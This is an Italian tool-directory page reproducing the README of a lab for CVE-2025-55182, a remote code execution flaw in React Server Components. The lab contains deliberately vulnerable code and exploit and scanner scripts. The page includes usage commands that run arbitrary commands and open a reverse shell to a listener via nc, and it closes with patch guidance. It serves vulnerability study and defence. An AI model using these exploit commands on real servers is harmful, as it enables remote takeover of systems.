Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
cve-2025-55182-poc | Kitploit
Strumenti/GitHubGitHub/mooowu/cve-2025-55182-poc
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebCTFPenetration TestingApprendimento e FormazioneStrumento di Accesso RemotoSviluppo PayloadLab e Pratica
GitHubmooowu/cve-2025-55182-poc

cve-2025-55182-poc

Vedi Repository
6 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2025-55182 (React2Shell) Laboratorio di Analisi della Vulnerabilità

Questo repository contiene un ambiente completo per analizzare e riprodurre CVE-2025-55182, una vulnerabilità critica di Remote Code Execution (RCE) in React Server Components (RSC) che colpisce React 19.x e Next.js 15.x.

⚠️ AVVERTENZA: Questo progetto contiene intenzionalmente codice vulnerabile. NON distribuirlo su un server pubblico o in un ambiente di produzione.

🔍 Panoramica della Vulnerabilità

  • CVE ID: CVE-2025-55182
  • Alias: React2Shell
  • Punteggio CVSS: 10.0 (CRITICO)
  • Tipo di Vulnerabilità: CWE-502 (Deserializzazione di Dati Non Attendibili)
  • Componenti Interessati:
    • React Server Components (19.0.0 - 19.2.0)
    • Next.js (15.0.0 - 16.0.7)
    • react-server-dom-webpack, react-server-dom-turbopack

Meccanismo

La vulnerabilità risiede nel modo in cui il runtime di React Server Components elabora i dati serializzati provenienti dalle richieste HTTP (Server Actions). Un attaccante può creare un payload dannoso del protocollo "Flight" che, una volta deserializzato dal server, esegue codice arbitrario prima che vengano effettuati i controlli di autenticazione.

📂 Struttura del Progetto

root@kitploit:~
react2shell/
├── vulnerable-app/       # Vulnerable Next.js 15 application
│   ├── app/
│   │   ├── actions.ts    # Vulnerable Server Actions
│   │   └── page.tsx      # UI for testing vulnerability
│   ├── Dockerfile        # Container definition
│   └── package.json
├── exploit/              # Exploit tools
│   ├── exploit.py        # Python PoC exploit
│   ├── scanner.py        # Vulnerability scanner
│   └── quick_exploit.sh  # Simple bash exploit
├── docs/                 # Analysis documentation
└── docker-compose.yml    # Isolated lab environment

🚀 Per Iniziare

Prerequisiti

  • Docker & Docker Compose
  • Python 3.x (per eseguire gli exploit localmente)

1. Avvia l'Ambiente di Laboratorio

Esegui l'applicazione vulnerabile in un container isolato:

root@kitploit:~
docker-compose up -d --build

L'applicazione sarà disponibile all'indirizzo http://localhost:3000.

2. Verifica l'Applicazione

Visita http://localhost:3000 nel tuo browser. Dovresti vedere l'interfaccia "React2Shell Lab" con diversi pannelli di test:

  • Esecuzione di Comandi: Test di injection diretta di comandi
  • Deserializzazione Non Sicura: Test degli exploit di deserializzazione basati su JSON
  • Lettura Arbitraria di File: Test di path traversal
  • Info di Sistema: Visualizza i dettagli di sistema (per verificare l'impatto dell'RCE)

⚔️ Sfruttamento

Forniamo diversi strumenti per testare la vulnerabilità.

Utilizzo dell'Exploit Python

  1. Installa i requisiti:

    root@kitploit:~
    pip install -r exploit/requirements.txt
    
  2. Verifica se è vulnerabile:

    root@kitploit:~
    python3 exploit/exploit.py -u http://localhost:3000 --check
    
  3. Esegui un comando:

    root@kitploit:~
    python3 exploit/exploit.py -u http://localhost:3000 -c "id"
    
  4. Reverse Shell (richiede un listener, es. nc -lvnp 4444):

    root@kitploit:~
    python3 exploit/exploit.py -u http://localhost:3000 --revshell -l HOST_IP -p 4444
    

Utilizzo dello Scanner

Cerca istanze vulnerabili di React/Next.js:

root@kitploit:~
python3 exploit/scanner.py -u http://localhost:3000

🛡️ Mitigazione

Per correggere questa vulnerabilità nelle tue applicazioni:

  1. Aggiorna le Dipendenze:

    • Aggiorna React alla versione 19.3.0 o successiva.
    • Aggiorna Next.js alla versione 15.0.5, 15.1.9 o 16.0.8 a seconda del tuo branch.
  2. Verifica la Patch: Controlla package.json per assicurarti che i pacchetti react-server-dom-* siano aggiornati.

📝 Disclaimer

Questo progetto è destinato esclusivamente a scopi educativi e di ricerca sulla sicurezza. Gli autori non si assumono alcuna responsabilità per l'uso improprio di questo materiale.

Scarica lo strumento